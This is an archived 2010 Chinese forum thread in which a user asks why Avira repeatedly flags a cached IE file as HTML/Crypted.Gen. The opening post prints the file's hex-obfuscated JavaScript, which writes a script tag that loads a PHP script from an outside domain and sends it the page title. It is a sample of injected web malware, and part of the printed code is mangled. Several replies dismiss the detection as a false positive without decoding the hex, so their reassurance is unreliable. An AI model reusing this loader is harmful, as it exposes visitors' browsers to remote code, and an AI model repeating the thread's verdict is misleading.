发现病毒或恶意程序！——高手请进

北国游子

真诚、坦荡，狂热、执着，无怨无悔、嫉恶如仇

1楼 大 中 小 发表于 2010-5-8 13:34 只看该作者

发现病毒或恶意程序！——高手请进

8日几乎一整天，小红伞不停拦截：发现病毒或恶意程序！

并提示：包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式

由于出现过于频繁，且均指向同一个位置，经查看，在IE临时文件夹中。但该位置文件无法用任何编辑软件打开，也无法复制。于是先在小红伞中将之隔离，再从隔离区恢复到另一个位置。该文件在IE临时文件夹中名为：116312516-notifierclient-

js_zh-CN[1].VIR

将该文件更名为文本文件，然后打开，内容如下：

var

_0x9713=[“\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x2E\x31\x37\x62\x62\x6A\x2E\x63\x6F\x6D\x2F\x6D\x77\x67\x6E\x64\x66\x61\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D\x67\x67\x26\x74\x3D”,”\x74\x69\x74\x6C\x65”,”\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65”];document_0x9713[0x3];document.write(“<script

language=’javascript’

src=’http://talkgadget.google.com/talkgadget/sp/116312516-notifierclient-

js_zh-CN.js?rr=1886680168’><\/script>”);

将其中地址输入IE地址，执行后显示下载：116312516-notifierclient-js_zh-CN.js

该文件经小红伞扫描没有问题。

该地址主页为：Google Chat - Chat with family and friends

经搜索学习，“.VIR”文件是被杀毒软件标识的文件。那么，病毒程序是116312516-notifierclient-js_zh-

CN.js吗？可该文件小红伞扫描认为没有问题！

我能做的就这些了，希望高手给予指教！！

补充：

点击“发新话题”时，小红伞立刻拦截：发现病毒或恶意程序！

提示同上：包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式

[ 本帖最后由 北国游子 于 2010-5-8 13:40 编辑 ]

---

Terminusbot 整理，讨论请前往 2049bbs.xyz

---

核子力量

Twitter.com/hzpower

2楼 大 中 小 发表于 2010-5-8 16:52 只看该作者

进安全模式全盘扫描一遍试试

02304H

10001100000100B

3楼 大 中 小 发表于 2010-5-8 17:01 只看该作者

查了一下，似乎是这个原因：

http://www.llsilver.com/invasion/xiaohongsan-HTML-Crypted.html

实话说这个解决方式挺矛盾的……

要是不扫临时文件夹的话，防护能力可是削弱了不少

还是得请善用伞的人士来讲解下怎么才能单独把这个屏蔽掉

北国游子

真诚、坦荡，狂热、执着，无怨无悔、嫉恶如仇

4楼 大 中 小 发表于 2010-5-9 01:38 只看该作者

原来并不真是病毒！

还真不好解决，排除IE临时文件夹，还真不放心。

每次提示的时候我选择删除或隔离，下面提示就不那么频繁了。但不知道那个JS文件到底是做什么的。

谢谢楼上！

imus

升斗小民

5楼 大 中 小 发表于 2010-5-9 01:42 只看该作者

我提供一个思路：

利用火狐浏览器的adblock plus插件

屏蔽有问题的js或者图片。

狗狗吃肉么浏览器下貌似也有相应的插件……

另外，本人用的是avast!

诺贝尔影帝

6楼 大 中 小 发表于 2010-5-9 08:52 只看该作者

没见过，请问楼主是去什么网站报错的？

按照那个解释“所有的1*1框架和wideth=0的框架”都会报毒，不知道有哪些网站是这样？

而且如此频繁出现，到现在小红伞不可能还在误报吧

我是用了一年多的C版小红伞，在数十台机子装过，但好像都没见过这个问题

北国游子

真诚、坦荡，狂热、执着，无怨无悔、嫉恶如仇

7楼 大 中 小 发表于 2010-5-9 10:13 只看该作者

我同时开着很多窗口，感觉应该就是http://www.google.com.hk/ig?hl=zh-

CN，但谷歌搜索我是默认打开的主页之一，只有那天出现这个情况。

02304H

10001100000100B

8楼 大 中 小 发表于 2010-5-9 10:49 只看该作者

回复 6楼 诺贝尔影帝 的话题

应该是小红伞对恶意网页定义过于宽泛的缘故……

虽然我用小红伞+firefox没有遇到这种情况

现在既然出中文版了, LZ你可以试试咨询官方

或者换avast吧

诺贝尔影帝

9楼 大 中 小 发表于 2010-5-9 16:21 只看该作者

我在ie8试过http://www.google.com.hk/ig?hl=zh-CN

没有任何问题，楼主是ie6?

我倒不觉得小红伞对恶意网页定义宽泛，小红伞被指误报多，主要还是一些破解软件、注册机之类。

高启发是会严格些，不够规范的网页是容易报毒，但不至于对Google的网页也误报吧。

PS：玩过一个小游戏，大丰收，小红伞一定报毒的，为了给老人玩，只有排除掉。

北国游子

真诚、坦荡，狂热、执着，无怨无悔、嫉恶如仇

10楼 大 中 小 发表于 2010-5-9 17:17 只看该作者

我是IE8。

也不确定是http://www.google.com.hk/ig?hl=zh-CN&refresh=1造成的，但小红伞的隔离文件中有这样一段：

encodeURIComponent(document[_0x9713[0x1]])+_0x9713[0x2]);document.write(“<script

language=’javascript’

src=’http://talkgadget.google.com/talkgadget/sp/116312516-notifierclient-

js_zh-CN.js?rr=1886680168’><\/script>”);

哪位高手可以解读

萧易寒

11楼 大 中 小 发表于 2010-5-11 10:45 只看该作者

回复 10楼 北国游子 的话题

有啥好解读的，google的js你还不信任？

库存袈裟

@bruceku 想象力比知识更重要。

12楼 大 中 小 发表于 2010-5-11 15:38 只看该作者

红伞最近误杀严重